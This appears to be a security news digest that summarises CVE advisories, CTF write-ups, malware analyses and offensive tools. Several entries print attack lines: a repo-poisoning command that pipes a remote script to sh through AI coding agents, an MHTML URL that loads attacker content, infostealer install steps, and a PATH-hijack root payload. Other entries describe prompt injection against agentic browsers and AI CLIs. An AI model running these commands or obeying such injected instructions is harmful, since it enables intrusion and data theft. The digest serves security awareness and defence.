The post shows how local AI CLIs (Gemini, Claude Code, Codex CLI, VS Code chat) can be abused for RCE. Gemini’s approval model over-approves by prefix, so allowing cat README.md can later auto-approve cat X && curl ... | sh. Attackers can poison repos with AI-specific markdown (e.g. GEMINI.md) instructing agents to run git submodule init then git submodule status && curl -o- https://raw.githubusercontent.com/mimoo/messingWithAIs/refs/heads/main/scripts/setup.sh | sh. A bash script then demonstrates using installed AI CLIs with flags like --dangerously-skip-permissions as post-exploitation helpers to, e.g., write the host IP into ip.txt.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: https://www.cisa.gov/news-events/alerts/2004/04/08/cross-domain-vulnerability-outlook-express-mhtml-protocol-handler

CVE CAN-2004-0380 (VU#323070) is a cross-domain vulnerability in the Outlook Express MHTML protocol handler. When an mhtml: URL references a non-existent local file and an alternate remote CHM resource via ITS handlers, the alternate CHM/HTML content is misclassified into the Local Machine Zone. A crafted URL like mhtml:file://C:\nosuchfile.mht!http://attacker/exploit.chm::exploit.html lets attacker script in exploit.html run with local privileges, enabling arbitrary code execution and cross-domain data access. Exploits are in the wild; mitigation is via MS04-013 and, temporarily, disabling MHTML/ITS protocol handlers in the registry.

🛡️ CVE | 💣 RCE | 🌐 Web

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1180/

CVE-2025-66499 (ZDI-25-1180) is a heap-based buffer overflow in Foxit PDF Reader’s PDF parsing. Malicious PDFs can supply attacker-controlled length fields that cause oversized data copies into fixed-size heap buffers, corrupting adjacent memory and enabling remote code execution in the user’s context. Exploitation requires the victim to open a crafted PDF or a web page that triggers Foxit Reader. Severity is high (CVSS 7.8: C:H/I:H/A:H), and Foxit provides patches via their security bulletins.

🛡️ CVE | 🌐 Web | 💣 RCE

🔗 Original article: https://www.cisa.gov/news-events/alerts/2004/02/05/http-parsing-vulnerabilities-check-point-firewall-1

Check Point Firewall-1 NG (FCS, FP1, FP2, FP3 HF2, R54, R55) has an HTTP parsing bug (VU#790771, CAN-2004-0039) in the HTTP Security Server and Application Intelligence components. Malformed HTTP requests cause attacker-controlled data to be used as the format string to sprintf(), leading to a format string vulnerability and possible heap overflow. Remote attackers can execute arbitrary code as SYSTEM/root on the firewall. Check Point released a "Firewall-1 HTTP Security Server Update" and advises disabling HTTP Security Servers/AI as a workaround.

🌐 Web | 🛡️ Supply Chain | ⚙️ CI/CD | 💣 RCE

🔗 Original article: https://words.filippo.io/compromise-survey/

The post surveys 2024–2025 open‑source supply‑chain compromises, classifying their initial access vectors: phishing, control handoff, unsafe GitHub Actions triggers (pull_request_target / issue_comment), long‑lived credential theft, domain/username resurrection, cache poisoning, post‑install hooks, mutable Action tags, and per‑branch CI drift. It explains how each technically enabled RCE or package takeover and proposes concrete mitigations: WebAuthn/passkeys, avoiding control handoff, eliminating dangerous CI triggers, adopting OIDC/trusted publishing, minimizing long‑lived tokens, avoiding shared caches, disabling npm scripts, using reproducible builds, pinning Actions by commit, and patching workflows across all branches.

🌐 Web | 💣 RCE | 🛡️ IMDS | 🛠️ Tool

🔗 Original article: https://www.latacora.com/blog/2025/10/02/ecs-on-ec2-covering-gaps-in-imds-hardening/

The post dissects how ECS tasks on EC2 can still reach EC2 IMDS and steal credentials, enabling ECScape-style privilege escalation. It shows that IMDSv2 with hop limit 1 only blocks bridge-mode tasks, while awsvpc and host tasks remain exposed. It then gives concrete mitigations: use ECS_AWSVPC_BLOCK_IMDS for awsvpc, IMDSv2 or iptables DOCKER-USER rules for bridge, and explains the unresolved trade-off in host mode between IMDS access and IAM task roles, recommending Fargate or ECS Managed Instances for stronger isolation.

💣 RCE | 🛡️ CVE | 🌐 Web

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1183/

ZDI-25-1183 / CVE-2025-13715 is a deserialization-of-untrusted-data bug in Tencent FaceDetection-DSFD’s resnet endpoint. A remote attacker can supply a crafted serialized payload that, when a user opens a malicious file or page, is deserialized by the service and executed as root. This yields full RCE with high impact. Tencent fixed the issue in commit a941d089d8ae2df5292a904e79d88649cb58a440.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1174/

ZDI-25-1174 / CVE-2025-66493 is a use-after-free in Foxit PDF Reader’s AcroForm handling. Foxit operates on an AcroForm-related object without validating that it still exists, enabling a use-after-free that attackers can abuse via malicious PDFs to gain arbitrary code execution in the Foxit process. Exploitation requires a user to open a crafted file. Patching via Foxit’s security updates is required.

🌐 Web | 🛡️ CVE | 💉 XSS

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1182/

CVE-2025-68614 (ZDI-25-1182) is a stored XSS in LibreNMS’s Alert Rule API. The rules endpoint fails to validate the name parameter, allowing authenticated attackers to inject script that executes when alert rules are viewed in the UI. Impact includes script execution in the victim’s session with low complexity but high required privileges. LibreNMS has released fixes documented in GHSA-c89f-8g7g-59wj.

🛡️ CVE | 💣 RCE | 🌐 Web

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1181/

ZDI-25-1181 / CVE-2025-68615 is a critical unauthenticated stack-based buffer overflow in the Net-SNMP snmptrapd service (UDP 162). Malformed SNMP trap messages can overflow a fixed-size stack buffer due to missing length validation, allowing remote code execution in the snmptrapd service context. Net-SNMP released a fix in advisory GHSA-4389-rwqf-q9gq, and administrators should update immediately.

🌐 Web | 🛡️ Defense | 🧾 Logging

🔗 Original article: https://www.latacora.com/blog/2024/10/23/mapping-your-path-to-a-more-mature-security-program-with-logs-and-audit-trails/

The article explains how to evolve from reusing developer logs (“Just Fancy Logs”) to a robust, SIEM-backed “Independent Audit Events” model. It details how to introduce a dedicated audit interface, which events to audit, what metadata each event must contain, and which data must never be logged. It shows a concrete Go log-forging example, discusses nonrepudiation and access control for tamper-resistant audit trails, and explains SIEM alerting design with the STAT framework and tabletop exercises to ensure logs and audit events truly support security investigations.

Web | CVE | RCE

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1176/

ZDI-25-1176 / CVE-2025-66495 is a high-severity RCE in Foxit PDF Reader’s Annotation handling. Due to missing validation of Annotation object existence before use, crafted PDFs can trigger a use-after-free–style condition and achieve arbitrary code execution in the Reader’s process. Exploitation requires a user to open a malicious file but no prior privileges. Patches are available via Foxit’s security bulletins.

🌐 Web | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://www.tenable.com/blog/cve-2025-14847-mongobleed-mongodb-memory-leak-vulnerability-exploited-in-the-wild

CVE-2025-14847 (MongoBleed) is an unauthenticated info-leak in MongoDB’s zlib decompression. When zlib compression is enabled, crafted wire-protocol requests cause uninitialized server memory to be returned, leaking logs, WiredTiger configs, /proc data, Docker paths, connection metadata and potentially credentials and API keys. A public PoC (MongoBleed) automates harvesting this data. Over 87,000 instances appear exposed. Patch to fixed MongoDB versions, or temporarily disable zlib, and restrict MongoDB access to trusted IPs. Use Tenable plugins and ASM (filter Services contains mongod) to find and remediate affected systems.

🌐 Web | 💉 XSS | 💰 Bug Bounty

🔗 Original article: https://blog.hackcommander.com/posts/2025/12/28/turning-a-harmless-xss-behind-a-waf-into-a-realistic-phishing-vector/

The blog details how a reflected attribute-based XSS on an SSO login page behind a WAF was turned into a credential-stealing phishing vector. By abusing a WAF that only inspected the first JS statement, using onfocus + #forgot_btn for auto-execution, and constructing a $.getScript URL via String.fromCharCode to bypass quote restrictions, the author loads an external keylogger that hooks document.onkeypress and exfiltrates keystrokes to an attacker server, enabling realistic credential theft via a seemingly legitimate SSO link.

🌐 Web | 🛡️ CVE | 📦 Deserialization | 🌊 SSRF

🔗 Original article: https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/

The post dissects multiple vulnerabilities in TCPDF and html2pdf, including path traversal via SVG and HTML images, a destructor-based POP chain for arbitrary file deletion, and several SSRF primitives (image and CSS loading, Phar deserialization). It shows, step by step with code and payloads, how attacker-controlled HTML or file paths let you read internal files, delete arbitrary files, or send HTTP requests to internal services. It also documents the vendor patches (6.8.1, 6.9.1, 6.9.3, 5.3.1) and provides concrete defensive patterns for safely handling paths and URLs.

🛡️ CVE | 💣 RCE | 🌐 Web

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1198/

CVE-2025-15062 (ZDI-25-1198) is a use-after-free in Trimble SketchUp’s SKP file parser. A crafted SKP model causes the parser to operate on an object whose existence is not revalidated, leading to memory corruption and arbitrary code execution in the current user’s context. Exploitation requires a user to open a malicious SKP file or visit a page that loads it. CVSS v3 score is 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). The issue is fixed in SketchUp 2026 version 26.0.429.

🌐 Web | 💣 RCE | 🛡️ CVE

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1191/

ZDI-25-1191 / CVE-2025-15273 is a 0‑day stack-based buffer overflow in FontForge’s PFB font parsing. Lack of bounds checking when copying user-supplied PFB data into a fixed-size stack buffer enables remote attackers to craft malicious PFB files that overwrite stack control data and achieve code execution in the current user’s context when the file is opened. CVSS v3.0 is 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). No patch exists; mitigation is to restrict or avoid opening untrusted PFB files with FontForge.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1189/

CVE-2025-15275 (ZDI-25-1189) is a heap-based buffer overflow in FontForge’s SFD parser. Malformed SFD files can trigger an unchecked heap copy, corrupting heap memory and enabling arbitrary code execution in the context of the current user when the file is opened. CVSS v3.0 is 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). No vendor patch exists; mitigation is to restrict use of FontForge to trusted SFD files and avoid untrusted input.

🌐 Web | 💣 RCE | 🛡️ CVE

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1190/

CVE-2025-15274 (ZDI-25-1190) is a heap-based buffer overflow in FontForge’s SFD file parser. Malicious SFD files can cause unchecked copying of user-supplied data into a heap buffer, corrupting adjacent memory and enabling remote code execution in the current user’s context. Exploitation requires opening a crafted SFD file. No patch exists; mitigation is to avoid untrusted SFD files and restrict FontForge usage.

CVE | Web | RCE

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1192/

CVE-2025-15272 (ZDI-25-1192) is a heap-based buffer overflow in FontForge’s SFD file parser. Overlong fields in a crafted SFD file overflow a heap buffer due to missing length validation, enabling heap corruption and potential remote code execution in the context of the FontForge user. Exploitation requires the victim to open a malicious SFD file. No vendor patch exists; mitigation is to avoid untrusted SFD files, de-associate .sfd from FontForge, and run it in a sandboxed environment.

🌐 Web | 🛡️ CVE | 💣 RCE

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1197/

CVE-2025-15061 (ZDI-25-1197) is a critical unauthenticated RCE in Framelink’s Figma MCP Server. The server’s fetchWithRetry method passes a user-controlled string into an OS system call without validation, enabling command injection and arbitrary code execution as the service account. Framelink has issued a fix (GHSA-gxw4-4fc5-9gr5); administrators should patch and restrict network exposure.

🛡️ CVE | 🌐 Web | 💣 RCE

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-25-1196/

CVE-2025-15059 (ZDI-25-1196) is a heap-based buffer overflow in GIMP’s PSP file parser. Malicious PSP files can specify lengths larger than the allocated heap buffer, causing overflow during data copy and enabling arbitrary code execution in the GIMP process when a user opens the file. Exploitation requires user interaction but no prior privileges. GIMP patched the parser with proper bounds checking in commit 03575ac8cbb0ef3103b0a15d6598475088dcc15e.

🛡️ CVE | 🌐 Web | 💉 XSS | 🎁 PoC

🔗 Original article: https://blog.ethiack.com/blog/grafana-cve-2025-6023-bypass-a-technical-deep-dive

Grafana CVE-2025-6023 fix bypass chain enabling XSS/account takeover. Bypass 1: server-side open redirect in /user/auth-tokens/rotate by smuggling the redirect target into the URL fragment (#) so Go url.Parse() yields Path “/” (passes validation) while the handler redirects using the original string (Location: /\/attacker.com). Bypass 2: frontend validatePath() validates a decoded/cleaned path but returns the original encoded value, allowing traversal from /dashboard/script/ to /user/auth-tokens/rotate. Combined URL loads attacker module.js. Fixed in >=11.6.8, 12.0.7, 12.1.4, 12.2.2, 12.3.0.

Tool | Fuzzing | Integer Overflow | Panic/Crash

🔗 Original article: https://blog.trailofbits.com/2025/12/31/detect-gos-silent-arithmetic-bugs-with-go-panikint/

go-panikint is a forked Go toolchain that instruments compilation (SSA/backend) so integer overflows that normally wrap silently become runtime panics, making them visible to fuzzers/CI as crashes with stack traces. It can optionally detect truncation (often noisy) and supports suppressions (path filters and inline comments). It helped find an overflow bug in Cosmos SDK pagination (Offset + Limit on uint64 can wrap and break query logic).

Web | XSS | Tool | PoC

🔗 Original article: https://0xdf.gitlab.io/flagvent2025/medium

Flagvent 2025 medium writeups: APNG stego by extracting frames and decoding pixel-counts as ASCII; Playwright admin-bot exploit via undeclared name -> window.name leading to DOM XSS (iframe/window.open target-name injection) and exfil via fetch; also javascript: URL execution if schemes aren’t restricted; hex hidden in package.json decoded with jq|xxd; modem/FSK decode using SoX + minimodem and extract bytes from CSS unicode-range.

💣 RCE | 🧨 PWN | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/flagvent2025/hard

Flagvent 2025 hard writeup. FV25.08 is a full PWN chain: a 32-bit overflow makes sizeof(u8*)*size wrap to 0, giving a 0-byte elements array but huge logical size, enabling heap OOB pointer writes. The exploit leaks heap and libc (by redirecting a pop to read obstack chunkfun → malloc), computes libc base, then overwrites a keller’s obs to a fake obstack with chunkfun=system, extra_arg=/bin/sh, use_extra_arg=1, and next_free==chunk_limit to trigger system("/bin/sh") on push. FV25.09 is a GHZ-state puzzle (no vuln).

Tool | Reverse | Malware | Exfiltration

🔗 Original article: https://unit42.paloaltonetworks.com/vvs-stealer/

Unit 42 reverse engineers VVS $tealer, a Python Discord infostealer packed with PyInstaller and obfuscated with Pyarmor 9.1.4 Pro (license 007444). The post shows how to extract raw marshal bytecode, rebuild a valid Python 3.11.5 .pyc, decompile with pycdc, then remove Pyarmor AES-128-CTR protections (keys/nonces and markers) and handle BCC mode (ELF-compiled functions). Deobfuscated VVS steals Discord tokens (DPAPI plus AES-GCM), injects Discord’s Electron client, steals browser data, persists via Startup, and exfiltrates via Discord webhooks.

🛡️ CVE | 🌐 Web | 🎁 PoC | 🧑‍💻 Account Takeover

🔗 Original article: https://dhakal-ananda.com.np/blogs/cve-2025-61922-analysis/

CVE-2025-61922 (CVSS 9.1) affects PrestaShop ps_checkout < 5.0.5. Unauthenticated attackers can POST JSON to /module/ps_checkout/ExpressCheckout with orderID and order.payer.email_address set to a victim email. The vulnerable flow calls CustomerAuthenticationAction::execute(), which uses customerExists(email) and then context->updateCustomer(new Customer(customerId)), silently switching sessions without any identity proof. Result: zero-click customer account takeover (PII exposure, potential abuse of saved cards); admins aren’t affected.

🛡️ CVE | 💥 Info Leak | 🌐 Network | 🎁 PoC

🔗 Original article: https://www.rapid7.com/blog/post/etr-mongobleed-cve-2025-1484-critical-memory-leak-in-mongodb-allowing-attackers-to-extract-sensitive-data

MongoBleed (CVE-2025-14847) is a remote, unauthenticated MongoDB memory disclosure triggered through the Zlib network-compression path. By sending manipulated Zlib-compressed protocol packets, attackers can “bleed” uninitialized heap memory and harvest secrets (cleartext creds, auth/session tokens, sensitive data). PoC released Dec 26, 2025; in-the-wild exploitation confirmed Dec 29, 2025. Affects MongoDB 4.4–8.0 when Zlib compression is enabled. Fix: upgrade (e.g., 8.0.4/7.0.16/6.0.20) or disable Zlib; rotate secrets after remediation.

🛡️ CVE | 🐧 Kernel | 💣 RCE | 🎁 PoC

🔗 Original article: https://github.com/farazsth98/chronomaly

Chronomaly is a C exploit (🎁 PoC) for the in-the-wild Android/Linux kernel bug CVE-2025-38352, targeting Linux 5.10.x (tested on 5.10.157 in QEMU). It uses CPU-timer-driven racing (signals like SIGUSR1) plus parent/child timing to hit a 2nd race window in send_sigqueue(), then performs cross-cache reallocation of struct sigqueue to replace a UAF object with a pipe buffer data page. Includes QEMU harness (qemu.sh) and tuning knobs (CPU_USAGE_THRESHOLD, PARENT_SETTIME_DELAY_US).

🛠️ Tool | 🌐 Web | 🕵️ Recon | 🔑 Secrets

🔗 Original article: https://github.com/jenish-sojitra/JSAnalyzer

JS Analyzer is a Burp Suite (Jython/Python) extension for static analysis of JavaScript responses. It extracts endpoints (API/auth/admin/well-known), full URLs (incl. AWS S3/Azure/GCP), secrets (AWS/Google/Stripe/GitHub/Slack/JWT/private keys/DB URLs), emails, and sensitive file references, while filtering common noise (XML namespaces, imports, PDF/Excel internals, locales, crypto libs). Install via Burp Extensions + Jython JAR, right-click JS responses to analyze, and export results to JSON.

☁️ Cloud | 🔓 Misconfig | 🟦 Azure | 🛠️ Tool

🔗 Original article: https://0xdf.gitlab.io/holidayhack2025/act1/blob-storage

The post shows how to find an Azure Blob Storage data exposure by enumerating storage accounts with Azure CLI + jq, spotting allowBlobPublicAccess: true on neighborhood2, then identifying a container with publicAccess: "Blob". It lists blobs in the public container and downloads admin_credentials.txt to /dev/stdout, revealing multiple cleartext admin passwords (Azure, AD, SQL, firewall, etc.). This is a high-severity cloud misconfiguration leading to anonymous data exfiltration.

⬆️ Privesc | 🐧 Linux | 🧩 Sudo | 🛠️ Misconfig

🔗 Original article: https://0xdf.gitlab.io/holidayhack2025/act1/neighborhood-watch

A sudo misconfiguration allows local root RCE via PATH hijacking. chiuser can run sudo /usr/local/bin/system_status.sh with env_keep+=PATH, and the script calls free, df, w, ps, grep, head without absolute paths. Dropping a malicious free into /home/chiuser/bin (first in PATH) executes as root. Payloads include chmod 777 /etc/firealarm to run /etc/firealarm/restore_fire_alarm via ./runtoanswer, or chmod +s /bin/bash then bash -p to keep euid=0.

Cloud | Secrets | Azure | Web

🔗 Original article: https://0xdf.gitlab.io/holidayhack2025/act1/spare-key

An Azure Storage static website accidentally exposes a Terraform tfvars file in the $web content path. Using Azure CLI enumeration and blob listing/downloading, the post shows extracting a leaked, long-lived SAS token with broad blob permissions, creating high-severity unauthorized access risk.

🦠 Malware | 🍎 macOS | 🕵️ DFIR | ⛓️ Persistence

🔗 Original article: https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/

A macOS infostealer incident (MDE-detected) shows 2025 tradecraft: trick users into copy/pasting a terminal “installer” from a spoofed Homebrew page. Stage 1 phishes the password, validates it with dscl . -authonly, saves it to /tmp/.pass, downloads /tmp/update from carmenzo.com, then uses sudo -S xattr -c /tmp/update, chmod +x, and executes it. Stage 2 harvests browser creds/files/wallets, zips to /tmp/out.zip, attempts curl POST exfil to gate + "/contact" with custom headers and 15 retries, installs LaunchDaemon persistence, and cleans traces. Egress controls blocked exfil.

🛠️ Tool | 📡 IoT | 🌐 Web | ⛓️ Web3

🔗 Original article: https://github.com/OwnGoalStudio/TrollNFC/

TrollNFC is a TrollStore-required iOS 15+ iPhone app for NFC read/write, NDEF editing (including URL records), batch processing, card library import/backup, and tag emulation with UID + NDEF. The README is not a vulnerability write-up (no CVEs/PoCs), but the tool is relevant for NFC security testing and potential abuse such as writing malicious NDEF URLs and emulating/cloning tags in systems that improperly trust UID/NDEF without cryptographic authentication.

📡 IoT | 💥 Auth Bypass | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://blog.nns.ee/2026/01/06/aike-ble/

Äike scooters use BLE GATT auth: read UUID 2556 (20-byte random), compute SHA-1 over (challenge + 20×0xFF), write digest to UUID 2557, then send 10-byte commands to UUID 155f (e.g., unlock). The “blePrivateKey” is the IoT SDK default and shared across scooters, enabling nearby attackers to authenticate and control any scooter. Post includes Frida hooks (Gatt + MessageDigest), Firestore key extraction command, and a Python bleak unlock PoC.

📶 WiFi | 🌐 Web | 🛠️ Tool | 🧷 Hardening

🔗 Original article: https://www.nccgroup.com/research-blog/eap-tls-the-most-secure-option/

EAP‑TLS is strong on paper (cert-based, no password), but NCC Group shows two practical failure modes: (1) unauthenticated username harvesting because EAP-Response/Identity is sent before TLS (demo uses airodump-ng + tshark -Y eap -V | grep Identity). (2) “m(?)TLS” deployments where Windows server-certificate validation is disabled or users can click through prompts, enabling Evil Twin APs (modified hostapd). Mitigate with privacy NAI (RFC4282) or computer auth, and enforce strict ServerValidationParameters (no prompts, validate server, pin names and CA thumbprints).

🛡️ CVE | 💣 RCE | 🧠 Heap | 🛠️ Tool

🔗 Original article: https://www.nccgroup.com/research-blog/pumping-iron-on-the-musl-heap-real-world-cve-2022-24834-exploitation-on-an-alpine-mallocng-heap/

NCC Group explains exploiting CVE-2022-24834 in Redis <=7.0.11 on Alpine (musl 1.2.4 mallocng), where glibc/ptmalloc2 PoCs fail. The Lua cjson integer overflow causes an undersized allocation then a ~0x15555555-byte (~341MiB) wild copy, requiring ~350MiB of contiguous mapped memory and adjacency to a target Lua allocation. The post details Lua 5.1 TValue/Table internals, mallocng groups/slots/stride, the cycling-offset mitigation (enframe()), and practical GDB tooling (muslheap, GdbLuaExtension) to shape the heap and corrupt Lua TValue->value pointers for ASLR bypass/RCE.

Web3 | RCE | Supply Chain | Proxy

🔗 Original article: https://www.nccgroup.com/research-blog/in-depth-technical-analysis-of-the-bybit-hack/

NCC Group’s post breaks down the Feb 21, 2025 Bybit $1.4B theft as a two-phase chain. First, a supply-chain–tampered Safe{Wallet} JS bundle selectively targeted Bybit signers and changed Safe tx fields immediately before EIP-712 signing, forcing operation=1 (delegatecall) to an attacker contract while restoring the original data after signing. Second, the on-chain Safe executed the delegatecall to an ERC-20-like transfer() function that actually wrote to storage slot 0, overwriting the Safe proxy implementation pointer and granting full wallet control.

Tool | Brute Force | Linux | Botnet

🔗 Original article: https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/

GoBruteforcer (GoBrut) is a Go-based Linux botnet that brute-forces FTP, MySQL, Postgres and phpMyAdmin (HTTP/80) using weak/default creds and misconfigs (not CVEs). It spreads via web shell → downloader → IRC bot → bruteforcer, persists with cron, and hides using prctl(PR_SET_NAME) + argv overwrites. The bruteforcer runs an arch-tuned worker pool (up to ~95 goroutines), scans random public IPs with hardcoded range exclusions, and reports hits to a /pst C2 endpoint. Some victims were used for TRON/BSC token sweeping.

🛡️ CVE | 🧪 SSRF | 🧷 CSRF | 🔑 Secrets

🔗 Original article: https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/

NCC Group tested hundreds of Jenkins plugins and found 100+ vulnerable ones. Two recurring issues: (1) plugins storing secrets in plaintext in plugin XML or job config.xml (and sometimes exposing tokens in the UI via wrong Jelly controls), and (2) “testConnection”/FormValidation endpoints missing POST enforcement + permission checks, making them CSRFable and usable for SSRF and credential capture. The post includes real file paths, XML snippets, and raw HTTP requests showing GET method downgrades that bypass Crumb. Fixes: use hudson.util.Secret/Credentials Plugin, correct Jelly secret controls, enforce @POST/@RequirePOST and Jenkins.get().checkPermission(Jenkins.ADMINISTER).

🛡️ CVE | 🌐 Web | 💣 RCE | 🎁 PoC

🔗 Original article: https://github.com/Chocapikk/CVE-2026-21858

PoC for n8n “Ni8mare” chain: unauthenticated arbitrary file read (CVE-2026-21858) via Content-Type confusion lets attackers control a file filepath and read local files when a vulnerable form workflow returns binaries in the HTTP response. The attacker reads /proc/self/environ, $HOME/.n8n/config (encryptionKey), and $HOME/.n8n/database.sqlite, derives the JWT secret and forges an admin n8n-auth cookie. Then expression injection RCE (CVE-2025-68613) escapes via this.process.mainModule.require and child_process.execSync.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://labs.watchtowr.com/do-smart-people-ever-say-theyre-smart-smartertools-smartermail-pre-auth-rce-cve-2025-52691/

CVE-2025-52691 in SmarterMail is a pre-auth RCE chain via /api/upload. The endpoint allows anonymous multipart uploads, deserializes contextData with JSON.NET into PostUploadProcessingTargetData (attacker controls guid), and routes via context=attachment into SaveAttachment(). The guid is embedded into the generated filename and concatenated into the final path without traversal checks, enabling arbitrary file write. By forcing .aspx via resumableFilename and traversing to inetpub/wwwroot, attackers get IIS RCE. Response leaks the final filename.

🛡️ CVE | 💣 RCE | 🛠️ Tool | ⛓️ Persistence

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-09-2026

Rapid7’s Metasploit Wrap-Up (Jan 9, 2026) adds an authenticated Taiga.io unsafe deserialization exploit for RCE (CVE-2025-62368) and a Python persistence module that abuses startup hook files in site-specific/dist-packages where lines starting with import auto-execute. It also improves RISC-V support with fetch-payload command adapters and a riscv32le bind shell payload, plus fixes SMB dialect negotiation handling and makes WP Reflex Gallery upload paths configurable. Update via msfupdate.

🛡️ CVE | 🌐 Web | 📁 LFI | ⬆️ Privesc

🔗 Original article: https://0xdf.gitlab.io/2026/01/10/htb-previous.html

HTB “Previous” chains CVE-2025-29927 (Next.js middleware auth bypass via x-middleware-subrequest) to access /docs, then abuses traversal in /api/download?example= to read server files like .env, package.json, and .next/server/pages/api/auth/[...nextauth].js. NextAuth contains a hard-coded fallback password (MyNameIsJeremyAndILovePancakes) that works for SSH as jeremy. Root is obtained via sudo terraform -chdir=/opt/examples apply, abusing preserved $HOME/.terraformrc provider overrides (malicious terraform-provider-examples) or preserved TF_VAR_source_path + symlink bypass to read root files.

🛡️ CVE | 🌐 Web | 🧬 SSRF | 🔌 WebSocket

🔗 Original article: https://rosecurify.com/two-cves-zero-ego-a-mailpit-story/

Mailpit (Go email testing tool) had two disclosed vulns. CVE-2026-21859: SSRF in /api/v1/proxy lets attackers supply arbitrary URLs; example fetches AWS IMDS via http://169.254.169.254/latest/meta-data/, enabling internal data access. Fixed in v1.28.1. CVE-2026-22689: CSWSH because WebSocket CheckOrigin always returns true, so any site can open a WS to a victim-reachable Mailpit instance and steal email contents in real time without auth. Fixed in v1.28.2.

🛠️ Tool | 📱 Mobile | 🤖 LLM | 🌐 SAST

🔗 Original article: https://github.com/roomkangali/droid-llm-hunter

Droid LLM Hunter is an Android APK vulnerability scanning tool that combines Apktool/JADX decompilation with call-graph + cross-reference context injection and a staged LLM pipeline (summarize → filter → deep scan). It supports static_only, llm_only, and hybrid filtering to reduce false positives, maps findings to OWASP MASVS (e.g., MASVS-STORAGE-1), and outputs structured JSON reports including severity/confidence/evidence and an attack-surface map.

🛠️ Tool | 📱 Mobile | 🧪 Reversing | 🧩 Frida

🔗 Original article: https://github.com/adityatelange/frida-ui

frida-ui is a lightweight web UI for Frida focused on Android pentesting. Install with uv tool install frida-ui and run frida-ui to use http://localhost:8000. It supports USB/remote Frida devices, app/process attach & spawn, script editing (Monaco optional), CodeShare imports, and live console/log export. Requires frida-server on the device with the same version as the host Frida Python package (example pin: frida==16.7.19). Includes a Java hook example overriding checkPassword() to return true.

🛠️ Tool | 📱 Android | 🧬 Reverse | 🔐 Crypto

🔗 Original article: https://github.com/fatalSec/DaliVM

DaliVM is a Python Dalvik bytecode emulator for Android analysis, focused on extracting decrypted strings from obfuscated APKs without a full Android runtime. Given a DEX-style method signature, it finds all call sites, resolves call arguments via backward data-flow tracing and forward lookup (plus partial execution when needed), emulates the method, and returns results. It supports 127+ Dalvik opcodes, multi-DEX, Android API mocking, Java stdlib hooks, and debug tracing via --debug.

📱 Mobile | 🧪 Frida | 🔐 TLS | 🎁 PoC

🔗 Original article: https://m4kr0.vercel.app/posts/flutter-ssl-bypass-how-to-intercept-https-traffic-when-all-other-frida-scripts-fail/

Flutter apps may not trust the Android system CA store and often use BoringSSL via libflutter.so, so Burp interception and common Frida pinning-bypass scripts can fail—especially across ARM vs x86_64 due to different layouts/offsets. The post shows how to extract the correct libflutter.so, find BoringSSL’s cert-chain verifier (ssl_crypto_x509_session_verify_cert_chain) in Ghidra via ssl_client string XREFs, compute the Frida offset (e.g., 0x02184644-0x100000=0x2084644), and patch the function to always return true, enabling HTTPS MITM. PoC repo included.

🌐 Web | 💉 XSS | 🛡️ CSRF | 🛠️ Tool

🔗 Original article: https://blog.trailofbits.com/2026/01/13/lack-of-isolation-in-agentic-browsers-resurfaces-old-vulnerabilities/

Trail of Bits shows agentic browsers often lack isolation between chat context, browsing origins, third‑party LLM servers, and the external network. Prompt injection acts like reflected/persistent XSS (attacker text becomes “instructions”), and cookie‑reusing tool requests act like CSRF—enabling misinformation, silent magic‑link session confusion, and cross‑site data exfiltration. The post includes concrete payloads for URL-based leaks, DNS/Search side channels, and location inference via personalized search. Mitigations: isolate tool contexts, split tools, content previews; long-term: extend SOP and CaMeL capability enforcement.

🛠️ Tool | 🐧 Linux | ☁️ Cloud | 🧩 Post-Exploitation

🔗 Original article: https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/

VoidLink is a Zig-based, cloud-native Linux malware/C2 framework found in December 2025. It uses a two-stage loader, a stable implant core, and BOF-like in-memory ELF .o plugins (37 listed). It profiles cloud/container environments (AWS/GCP/Azure/Alibaba/Tencent; Docker/K8s), adapts behavior via EDR/hardening “risk scoring”, and supports rootkits (LD_PRELOAD <4.0 or kernel-flag off; LKM ≥4.0; eBPF ≥5.5). C2 supports HTTP/1.1, HTTP/2, WebSocket, DNS, ICMP via “VoidStream” with traffic camouflage; includes anti-analysis and anti-forensics plus IOC hashes.

📱 Mobile | 🔐 Android | 🧰 Tool | 🧬 Bypass

🔗 Original article: https://m4kr0.vercel.app/posts/play-integrity-api-how-it-works--how-to-bypass-it/

